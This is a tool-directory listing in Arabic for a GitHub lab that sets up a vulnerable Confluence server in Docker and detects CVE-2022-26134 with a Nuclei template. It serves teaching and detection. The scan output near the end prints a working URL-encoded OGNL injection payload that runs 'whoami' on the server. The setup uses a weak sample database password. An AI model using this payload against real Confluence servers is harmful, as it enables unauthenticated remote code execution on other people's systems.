Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26134-LAB — كشف CVE-2022-26134 باستخدام Nuclei | Kitploit
أدوات/GitHubGitHub/skhalsa-sigsci/cve-2022-26134-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubskhalsa-sigsci/cve-2022-26134-lab

CVE-2022-26134-LAB

كشف CVE-2022-26134 باستخدام Nuclei

عرض المستودع
31منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-26134-LAB

يتضمّن Confluence Server وConfluence Data Center ثغرةً كبيرةً في تنفيذ التعليمات البرمجية عن بُعد دون الحاجة إلى مصادقة، تُعرَف باسم CVE-2022-26134، وفقًا لتنبيه أمني أصدرته Atlassian في 2 يونيو 2022. لم تكن الثغرة مُصحَّحة عند نشرها في 2 يونيو، وكان يتم استغلالها في البيئات الحقيقية. اعتبارًا من 3 يونيو، تتوفر كلٌّ من التصحيحات وحلٍّ مؤقت.

هذا المستودع مخصّص للأغراض التجريبية والتعليمية فقط.

المتطلبات

  • Docker
  • Nuclei

بيئة Confluence المعرضة للثغرة

تشغيل البيئة المعرضة للثغرة

root@kitploit:~
docker-compose up

بمجرد بدء التشغيل، يمكنك الوصول إلى خادم Confluence باستخدام عنوان URL التالي:

http://127.0.0.1:8090/

إعداد خادم Confluence

  1. في أول زيارة للموقع، سيتم توجيهك عبر عملية الإعداد.
  2. لا تحدد أي خيارات واختر "Next" في صفحة "Get apps".
  3. في صفحة مفتاح الترخيص، انقر على الرابط الذي يقول "Get an evaluation license".
  4. ستتم إعادة توجيهك إلى my.atlassian.com. تأكد من أن نوع الترخيص المحدد هو Confluence (Data Center). اكتب أي اسم مؤسسة ترغب به. تأكد من أن زر الاختيار بجوار "Your instance is" محدد على "up and running". بعد التحقق من هذه التفاصيل، انقر على زر "Generate License".
  5. ستظهر نافذة تأكيد منبثقة تسألك إذا كنت تريد تثبيته على الخادم: 127.0.0.1. اختر "Yes".
  6. سيؤدي اختيار "Yes" إلى ملء مفتاح الترخيص تلقائيًا في نسختك المحلية من Confluence. اختر "Next".
  7. اختر نوع النشر "Standalone" ثم اختر "Next".
  8. في صفحة إعداد قاعدة البيانات، يجب ملء التفاصيل على النحو التالي:
    • نوع قاعدة البيانات: PostgreSQL
    • نوع الإعداد: Simple
    • اسم المضيف: db
    • المنفذ: 5432
    • اسم قاعدة البيانات: confluence
    • اسم المستخدم: confluence
    • كلمة المرور: 123456789
  9. بعد ملء هذه الحقول، اضغط على زر "Test connection". يجب أن تتلقى الرسالة "Success! Database connected successfully". ثم انقر على "Next".
  10. سيبدأ إعداد قاعدة البيانات. قد يستغرق ذلك بعض الوقت. انتظر قليلًا.
  11. بمجرد اكتمال إعداد قاعدة البيانات، ستكون في صفحة "Load Content". اختر زر "Example Site".
  12. بعد ذلك، في صفحة "Configure User Management"، اختر "Manage users and groups with Confluence".
  13. بعد ذلك، في صفحة "Configure System Administrator Account"، أنشئ حسابًا واختر "Next".
  14. بمجرد اكتمال العملية، سترى أن الإعداد تم بنجاح. اضغط على "Start".
  15. سيُطلب منك "Create a space to store your work". أدخل أي اسم مساحة تريده.
  16. تخطَّ البرنامج التعليمي.
  17. لقد أكملت الآن إعداد التقييم لخادم Confluence.

اكتشاف CVE-2022-26134

الثغرة هي ثغرة حقن OGNL تؤثر على خادم HTTP. يتم وضع حمولة OGNL في URI الخاص بطلب HTTP. يبدو أن أي نوع من طرق HTTP يعمل، سواء كانت صالحة (GET وPOST وPUT وغيرها) أو غير صالحة (مثل "BALH").

https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

استخدام Nuclei

شغّل أمر Nuclei التالي:

root@kitploit:~
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml

مخرجات الفحص

root@kitploit:~
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]
تنزيل الأداة